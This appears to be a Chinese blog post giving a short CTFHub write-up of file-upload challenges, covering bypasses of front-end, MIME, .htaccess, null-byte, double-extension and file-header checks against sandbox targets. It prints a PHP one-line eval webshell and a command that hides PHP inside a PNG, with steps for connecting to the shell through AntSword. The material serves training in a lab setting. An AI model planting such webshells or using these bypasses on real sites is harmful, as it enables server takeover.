ctfhub文件上传

fasewer2024-08-06 16:47

⽆验证

上传⼀句话⽊⻢,发现上传成功

复制代码 
1.php ⼀句话⽊⻢内容:
<?php @eval($_POST[cmd]);?>

上传⼀句话⽊⻢,发现上传成功

复制代码 
http://challenge-8b27d18368ecc25c.sandbox.ctfhub.com:10800/upload/1.ph
p

前端验证

开启题⽬

上传⼀个 1.jpg,内容是

复制代码 
<?php @eval($_POST[cmd]);?>

上传抓包,修改后缀为 php

放包,上传成功

蚁剑连接

复制代码 
http://challenge-3c592a81e5b9e7a6.sandbox.ctfhub.com:10800/upload/1.ph
p

在/var/www/html/flag_2925720673.php找到flag

.htaccess

先上传.htaccess

再上传1.jpg

蚁剑连接

注意是1.jpg不是1.php

复制代码 
http://challenge-dc29f7e0bd8df3ff.sandbox.ctfhub.com:10800/upload/1.jpg

得到flag

MIME 绕过

上传2.jpg抓包修改为2.php

蚁剑连接

00 截断

上传2.php抓包并修改成如下图所示

蚁剑连接

双写绕过

抓包修改成如下所示

蚁剑连接

⽂件头检测

命令行以管理员身份运行

png照片可截图获得,不可通过改文件后缀获得

且必须在文件所在目录下

复制代码 
copy 2.png/b + 2.php/a 3.png

上传3.png并抓包修改

蚁剑连接

相关推荐
TechWayfarer4 小时前
账号安全实战:基于IP归属地基线的三原则异地登录风控模型
服务器·网络·python·安全·网络安全
2301_780789667 小时前
多层级 CC 防护体系:前端验证与后端限流的协同配置实践
运维·服务器·前端·网络安全·智能路由器·状态模式
梧六柒7 小时前
6-大小写绕过
网络安全
X7x58 小时前
终端安全管理(ESM):企业安全的“数字神经中枢“
网络安全·网络攻击模型·安全威胁分析·安全架构·esm
梧六柒18 小时前
5-.点+空格+点绕过 || .user.ini绕过
网络安全
pencek1 天前
HakcMyVM-Slackware
网络安全
X7x51 天前
终端防护平台(EPP):企业安全的“数字护城河“
网络安全·网络攻击模型·安全威胁分析·安全架构·epp
汤愈韬1 天前
防火墙主备备份的非VRRP的三种模式
网络·网络安全·security
Chockmans1 天前
春秋云境CVE-2022-32991(手注和sqlmap)保姆级教学
数据库·安全·web安全·网络安全·oracle·春秋云境·cve-2022-32991
云安全助手1 天前
中小企业上云指南:如何用云服务器搭建安全稳定的办公系统
网络安全
热门推荐
01GitHub 镜像站点02Codex 接入 DeepSeek API 完整配置文档03CC-Switch & Claude 基于 Linux 服务器安装使用指南04【AI】2026 年具身智能模型和世界模型总结05零基础教你claude code 接入 deepseek V406AI科技热点日报 | 2026年5月11日07codex app每次打开重连5次Reconnecting问题解决08人工智能最新动态 AI 日报 · 2026年5月10日09Gemini大升级、AI眼镜首发、Android XR亮相,13天后见分晓10Cursor 接入 DeepSeek‑V4‑Pro 完整指南(2026 实测)